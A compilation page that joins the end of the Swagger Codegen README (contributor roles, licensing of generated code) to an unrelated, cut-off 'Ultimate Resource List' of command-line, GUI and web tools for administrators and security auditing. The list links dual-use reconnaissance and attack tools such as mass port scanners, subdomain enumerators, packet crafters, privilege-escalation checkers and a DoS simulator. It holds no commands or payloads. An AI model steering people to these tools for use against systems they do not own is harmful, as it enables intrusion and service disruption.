To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator.
# Swagger Codegen Evangelist
Swagger Codegen Evangelist shoulders one or more of the following responsibilities:
- publishes articles on the benefit of Swagger Codegen
- organizes local Meetups
- presents the benefits of Swagger Codegen in local Meetups or conferences
- actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D)
- submits PRs to improve Swagger Codegen
- reviews PRs submitted by the others
- ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors)
If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to wing328hk@gmail.com (@wing328)
### List of Swagger Codegen Evangelists
- Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016)
- [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem)
- [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/)
# License information on Generated Code
The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points:
* The templates included with this project are subject to the [License](#license).
* Generated code is intentionally _not_ subject to the parent project license
When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate.
License
-------
Copyright 2017 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---
<img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
|
# Ultimate Resource List
##
# https://gist.github.com/bgoonz/be5c5be77169ef333b431bc37d331176
##
##
- **[CLI Tools](#cli-tools-toc)**
- **[GUI Tools](#gui-tools-toc)**
- **[Web Tools](#web-tools-toc)**
- **[Systems/Services](#systemsservices-toc)**
- **[Networks](#networks-toc)**
- **[Containers/Orchestration](#containersorchestration-toc)**
- **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)**
- **[Inspiring Lists](#inspiring-lists-toc)**
- **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)**
- **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)**
- **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)**
- **[Other Cheat Sheets](#other-cheat-sheets-toc)**
- **[One-liners](#one-liners-toc)**
- **[Shell functions](#shell-functions-toc)**
## :trident:
#### CLI Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Shells
<p>
✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>
✅ <a href="https://ohmyz.sh/"><b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br>
✅ <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a> - the Fishshell framework.<br>
✅ <a href="https://github.com/starship/starship"><b>Starship</b></a> - the cross-shell prompt written in Rust.<br>
✅ <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br>
</p>
##### :black_small_square: Shell plugins
<p>
✅ <a href="https://github.com/rupa/z"><b>z</b></a> - tracks the folder you use the most and allow you to jump, without having to type the whole path.<br>
✅ <a href="https://github.com/junegunn/fzf"><b>fzf</b></a> - is a general-purpose command-line fuzzy finder.<br>
✅ <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a> - Fish-like autosuggestions for Zsh.<br>
✅ <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a> - Fish shell like syntax highlighting for Zsh.<br>
✅ <a href="https://github.com/unixorn/awesome-zsh-plugins"><b>Awesome ZSH Plugins</b></a> - A list of frameworks, plugins, themes and tutorials for ZSH.<br>
</p>
##### :black_small_square: Managers
<p>
✅ <a href="https://midnight-commander.org/"><b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br>
✅ <a href="https://github.com/ranger/ranger"><b>ranger</b></a> - is a VIM-inspired filemanager for the console.<br>
✅ <a href="https://github.com/jarun/nnn"><b>nnn</b></a> - is a tiny, lightning fast, feature-packed file manager.<br>
✅ <a href="https://www.gnu.org/software/screen/"><b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br>
✅ <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br>
✅ <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br>
</p>
##### :black_small_square: Text editors
<p>
✅ <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br>
✅ <a href="https://www.vim.org/"><b>vim</b></a> - is a highly configurable text editor.<br>
✅ <a href="https://www.gnu.org/software/emacs/"><b>emacs</b></a> - is an extensible, customizable, free/libre text editor, and more.<br>
✅ <a href="https://github.com/zyedidia/micro"><b>micro</b></a> - is a modern and intuitive terminal-based text editor.<br>
✅ <a href="https://neovim.io/"><b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br>
✅ <a href="https://www.spacemacs.org/"><b>spacemacs</b></a> - a community-driven Emacs distribution.<br>
✅ <a href="https://spacevim.org/"><b>spacevim</b></a> - a community-driven vim distribution.<br>
</p>
##### :black_small_square: Files and directories
<p>
✅ <a href="https://github.com/sharkdp/fd"><b>fd</b></a> - is a simple, fast and user-friendly alternative to find.<br>
✅ <a href="https://dev.yorhel.nl/ncdu"><b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br>
</p>
##### :black_small_square: Network
<p>
✅ <a href="https://www.putty.org/"><b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br>
✅ <a href="https://mosh.org/"><b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br>
✅ <a href="https://eternalterminal.dev/"><b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br>
✅ <a href="https://nmap.org/"><b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br>
✅ <a href="https://github.com/zmap/zmap"><b>zmap</b></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br>
✅ <a href="https://github.com/RustScan/RustScan"><b>Rust Scan</b></a> - to find all open ports faster than Nmap.<br>
✅ <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br>
✅ <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br>
✅ <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br>
✅ <a href="https://github.com/traviscross/mtr"><b>mtr</b></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single tool.<br>
✅ <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a> - utility which combines the functions of the different network probes in one diagnostic tool.<br>
✅ <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - utility which reads and writes data across network connections, using the TCP/IP protocol.<br>
✅ <a href="http://www.dest-unreach.org/socat/"><b>socat</b></a> - utility which transfers data between two objects.<br>
✅ <a href="https://www.tcpdump.org/"><b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br>
✅ <a href="https://www.wireshark.org/docs/man-pages/tshark.html"><b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br>
✅ <a href="https://termshark.io/"><b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br>
✅ <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a> - is like GNU grep applied to the network layer.<br>
✅ <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br>
✅ <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a> - dump unix domain socket traffic.<br>
✅ <a href="https://github.com/google/stenographer"><b>stenographer</b></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br>
✅ <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a> - visualize packets in TUI.<br>
✅ <a href="https://github.com/tgraf/bmon"><b>bmon</b></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br>
✅ <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br>
✅ <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a> - is a network traffic monitor for Linux and BSD.<br>
✅ <a href="https://iperf.fr/"><b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br>
✅ <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br>
✅ <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br>
✅ <a href="https://github.com/mpolden/echoip"><b>echoip</b></a> - is a IP address lookup service.<br>
✅ <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br>
✅ <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a> - a mid-level packet manipulation library for Ruby.<br>
✅ <a href="https://scapy.net/"><b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br>
✅ <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a> - is a collection of Python classes for working with network protocols.<br>
✅ <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a> - is a tool for SSH server auditing.<br>
✅ <a href="https://aria2.github.io/"><b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br>
✅ <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a> - observe the path of packets through the iptables chains.<br>
✅ <a href="https://github.com/proabiral/inception"><b>inception</b></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br>
</p>
##### :black_small_square: Network (DNS)
<p>
✅ <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a> - is a DNS diagnostics and performance measurement tools.<br>
✅ <a href="https://github.com/mschwager/fierce"><b>fierce</b></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br>
✅ <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br>
✅ <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a> - is a fast subdomains enumeration tool for penetration testers.<br>
✅ <a href="https://github.com/OWASP/Amass"><b>amass</b></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives, and more.<br>
✅ <a href="https://github.com/google/namebench"><b>namebench</b></a> - provides personalized DNS server recommendations based on your browsing history.<br>
✅ <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br>
✅ <a href="https://github.com/guelfoweb/knock"><b>knock</b></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br>
✅ <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a> - DNS performance testing tools.<br>
✅ <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br>
✅ <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a> - API client providing access to passive DNS database systems.<br>
✅ <a href="https://github.com/looterz/grimd"><b>grimd</b></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br>
</p>
##### :black_small_square: Network (HTTP)
<p>
✅ <a href="https://curl.haxx.se/"><b>curl</b></a> - is a command line tool and library for transferring data with URLs.<br>
✅ <a href="https://gitlab.com/davidjpeacock/kurly"><b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br>
✅ <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a> - is an user-friendly HTTP client.<br>
✅ <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a> - is an interactive cli tool for HTTP inspection.<br>
✅ <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a> - is a conformance testing tool for HTTP/2 implementation.<br>
✅ <a href="https://github.com/gildasio/h2t"><b>h2t</b></a> - is a simple tool to help sysadmins to hardening their websites.<br>
✅ <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br>
✅ <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br>
✅ <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a> - is an interactive web server.<br>
✅ <a href="https://lynx.browser.org/"><b>Lynx</b></a> - is a text browser for the World Wide Web.<br>
✅ <a href="https://github.com/browsh-org/browsh/"><b>Browsh</b></a> - is a fully interactive, real-time, and modern text-based browser.<br>
✅ <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a> - a list of (almost) all headless web browsers in existence.<br>
✅ <a href="https://httpd.apache.org/docs/2.4/programs/ab.html"><b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br>
✅ <a href="https://www.joedog.org/siege-home/"><b>siege</b></a> - is an http load testing and benchmarking utility.<br>
✅ <a href="https://github.com/wg/wrk"><b>wrk</b></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br>
✅ <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a> - is a constant throughput, correct latency recording variant of wrk.<br>
✅ <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a> - is a constant throughput, correct latency recording variant of wrk.<br>
✅ <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br>
✅ <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a> - http/https load testing and benchmarking tool.<br>
✅ <a href="https://github.com/rakyll/hey"><b>hey</b></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br>
✅ <a href="https://github.com/tarekziade/boom"><b>boom</b></a> - is a script you can use to quickly smoke-test your web app deployment.<br>
✅ <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br>
✅ <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a> - is a free and open source directory/file & DNS busting tool written in Go.<br>
✅ <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a> - command-line reference-implementation client for SSL Labs APIs.<br>
✅ <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a> - Mozilla HTTP Observatory cli version.<br>
</p>
##### :black_small_square: SSL
<p>
✅ <a href="https://www.openssl.org/"><b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br>
✅ <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html"><b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br>
✅ <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze
</b></a> - fast and powerful SSL/TLS server scanning library.<br>
✅ <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br>
✅ <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a> - testing TLS/SSL encryption anywhere on any port.<br>
✅ <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br>
✅ <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br>
✅ <a href="https://github.com/certbot/certbot"><b>Certbot</b></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br>
✅ <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br>
✅ <a href="https://github.com/square/certstrap"><b>certstrap</b></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br>
✅ <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br>
✅ <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a> - open source tool to help you build a valid SSL certificate chain.<br>
</p>
##### :black_small_square: Security
<p>
✅ <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux"><b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br>
✅ <a href="https://wiki.ubuntu.com/AppArmor"><b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br>
✅ <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a> - Automated System Hardening Framework.<br>
✅ <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br>
</p>
##### :black_small_square: Auditing Tools
<p>
✅ <a href="https://www.ossec.net/"><b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br>
✅ <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"><b>auditd</b></a> - provides a way to track security-relevant information on your system.<br>
✅ <a href="https://www.nongnu.org/tiger/"><b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br>
✅ <a href="https://cisofy.com/lynis/"><b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br>
✅ <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br>
✅ <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br>
✅ <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a> - is a light-weight tool that helps to detect malware running on the system.<br>
</p>
##### :black_small_square: System Diagnostics/Debuggers
<p>
✅ <a href="https://github.com/strace/strace"><b>strace</b></a> - diagnostic, debugging and instructional userspace utility for Linux.<br>
✅ <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br>
✅ <a href="https://en.wikipedia.org/wiki/Ltrace"><b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br>
✅ <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a> - is a friendly wrapper around ptrace.<br>
✅ <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br>
✅ <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a> - high-level tracing language for Linux eBPF.<br>
✅ <a href="https://github.com/draios/sysdig"><b>sysdig</b></a> - system exploration and troubleshooting tool with first class support for containers.<br>
✅ <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br>
✅ <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br>
✅ <a href="https://nicolargo.github.io/glances/"><b>glances</b></a> - cross-platform system monitoring tool written in Python.<br>
✅ <a href="https://github.com/hishamhm/htop"><b>htop</b></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br>
✅ <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a> - Linux resource monitor written in pure Bash.<br>
✅ <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br>
✅ <a href="https://www.atoptool.nl/"><b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br>
✅ <a href="https://en.wikipedia.org/wiki/Lsof"><b>lsof</b></a> - displays in its output information about files that are opened by processes.<br>
✅ <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br>
✅ <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a> - convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br>
✅ <a href="https://github.com/mozilla/rr"><b>rr</b></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br>
✅ <a href="https://pcp.io/index.html"><b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br>
✅ <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a> - a command-line hex viewer.<br>
</p>
##### :black_small_square: Log Analyzers
<p>
✅ <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a> - slice and dice log files on the command line.<br>
✅ <a href="https://lnav.org"><b>lnav</b></a> - log file navigator with search and automatic refresh.<br>
✅ <a href="https://goaccess.io/"><b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br>
✅ <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a> - real-time metrics for nginx server.<br>
</p>
##### :black_small_square: Databases
<p>
✅ <a href="https://github.com/xo/usql"><b>usql</b></a> - universal command-line interface for SQL databases.<br>
✅ <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a> - postgres CLI with autocompletion and syntax highlighting.<br>
✅ <a href="https://github.com/dbcli/mycli"><b>mycli</b></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br>
✅ <a href="https://github.com/dbcli/litecli"><b>litecli</b></a> - SQLite CLI with autocompletion and syntax highlighting.<br>
✅ <a href="https://github.com/dbcli/mssql-cli"><b>mssql-cli</b></a> - SQL Server CLI with autocompletion and syntax highlighting.<br>
✅ <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br>
✅ <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a> - sync data from one Postgres database to another.<br>
✅ <a href="https://github.com/laixintao/iredis"><b>iredis</b></a> - a terminal client for redis with autocompletion and syntax highlighting.<br>
</p>
##### :black_small_square: TOR
<p>
✅ <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a> - script to make Tor Network your default gateway.<br>
✅ <a href="https://github.com/trimstray/multitor"><b>multitor</b></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br>
</p>
##### :black_small_square: Messengers/IRC Clients
<p>
✅ <a href="https://irssi.org"><b>Irssi</b></a> - is a free open source terminal based IRC client.<br>
✅ <a href="https://weechat.org/"><b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br>
</p>
##### :black_small_square: Productivity
<p>
✅ <a href="https://taskwarrior.org"><b>taskwarrior</b></a> - task management system, todo list <br>
</p>
##### :black_small_square: Other
<p>
✅ <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a> - tools for Linux/Unix sysadmins.<br>
✅ <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br>
✅ <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br>
✅ <a href="https://github.com/rgburke/grv"><b>GRV</b></a> - is a terminal based interface for viewing Git repositories.<br>
✅ <a href="https://jonas.github.io/tig/"><b>Tig</b></a> - text-mode interface for Git.<br>
✅ <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a> - simplified and community-driven man pages.<br>
✅ <a href="https://github.com/mholt/archiver"><b>archiver</b></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br>
✅ <a href="https://github.com/tj/commander.js"><b>commander.js</b></a> - minimal CLI creator in JavaScript.<br>
✅ <a href="https://github.com/tomnomnom/gron"><b>gron</b></a> - make JSON greppable!<br>
✅ <a href="https://github.com/itchyny/bed"><b>bed</b></a> - binary editor written in Go.<br>
</p>
#### GUI Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Terminal emulators
<p>
✅ <a href="https://github.com/Guake/guake"><b>Guake</b></a> - is a dropdown terminal made for the GNOME desktop environment.<br>
✅ <a href="https://gnometerminator.blogspot.com/p/introduction.html"><b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br>
✅ <a href="https://sw.kovidgoyal.net/kitty/"><b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br>
✅ <a href="https://github.com/alacritty/alacritty"><b>Alacritty</b></a> - is a fast, cross-platform, OpenGL terminal emulator.<br>
</p>
##### :black_small_square: Network
<p>
✅ <a href="https://www.wireshark.org/"><b>Wireshark</b></a> - is the world’s foremost and widely-used network protocol analyzer.<br>
✅ <a href="https://www.ettercap-project.org/"><b>Ettercap</b></a> - is a comprehensive network monitor tool.<br>
✅ <a href="https://etherape.sourceforge.io/"><b>EtherApe</b></a> - is a graphical network monitoring solution.<br>
✅ <a href="https://packetsender.com/"><b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br>
✅ <a href="https://ostinato.org/"><b>Ostinato</b></a> - is a packet crafter and traffic generator.<br>
✅ <a href="https://jmeter.apache.org/"><b>JMeter™</b></a> - open source software to load test functional behavior and measure performance.<br>
✅ <a href="https://github.com/locustio/locust"><b>locust</b></a> - scalable user load testing tool written in Python.<br>
</p>
##### :black_small_square: Browsers
<p>
✅ <a href="https://www.torproject.org/"><b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br>
</p>
##### :black_small_square: Password Managers
<p>
✅ <a href="https://keepassxc.org/"><b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br>
✅ <a href="https://bitwarden.com/"><b>Bitwarden</b></a> - open source password manager with built-in sync.<br>
</p>
##### :black_small_square: Messengers/IRC Clients
<p>
✅ <a href="https://hexchat.github.io/index.html"><b>HexChat</b></a> - is an IRC client based on XChat.<br>
✅ <a href="https://pidgin.im/"><b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br>
</p>
##### :black_small_square: Messengers (end-to-end encryption)
<p>
✅ <a href="https://www.signal.org/"><b>Signal</b></a> - is an encrypted communications app.<br>
✅ <a href="https://wire.com/en/"><b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br>
✅ <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br>
✅ <a href="https://matrix.org/"><b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br>
</p>
##### :black_small_square: Text editors
<p>
✅ <a href="https://www.sublimetext.com/3"><b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br>
✅ <a href="https://code.visualstudio.com/"><b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br>
✅ <a href="https://atom.io/"><b>Atom</b></a> - a hackable text editor for the 21st Century.<br>
</p>
#### Web Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Browsers
<p>
✅ <a href="https://www.ssllabs.com/ssltest/viewMyClient.html"><b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br>
✅ <a href="https://caniuse.com/"><b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br>
✅ <a href="https://panopticlick.eff.org/"><b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br>
✅ <a href="https://privacy.net/analyzer/"><b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br>
✅ <a href="https://browserleaks.com/"><b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br>
✅ <a href="https://www.howsmyssl.com/"><b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br>
✅ <a href="https://suche.org/sslClientInfo"><b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br>
</p>
##### :black_small_square: SSL/Security
<p>
✅ <a href="https://www.ssllabs.com/ssltest/"><b>SSLLabs Server Test</b></a> - performs a deep analysis of the configuration of any SSL web server.<br>
✅ <a href="https://dev.ssllabs.com/ssltest/"><b>SSLLabs Server Test (DEV)</b></a> - performs a deep analysis of the configuration of any SSL web server.<br>
✅ <a href="https://www.immuniweb.com/ssl/"><b>ImmuniWeb® SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br>
✅ <a href="https://www.jitbit.com/sslcheck/"><b>SSL Check</b></a> - scan your website for non-secure content.<br>
✅ <a href="http://www.ssltools.com"><b>SSL Scanner</b></a> - analyze website security.<br>
✅ <a href="https://cryptcheck.fr/"><b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br>
✅ <a href="https://urlscan.io/"><b>urlscan.io</b></a> - service to scan and analyse websites.<br>
✅ <a href="https://report-uri.com/home/tools"><b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br>
✅ <a href="https://csp-evaluator.withgoogle.com/"><b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br>
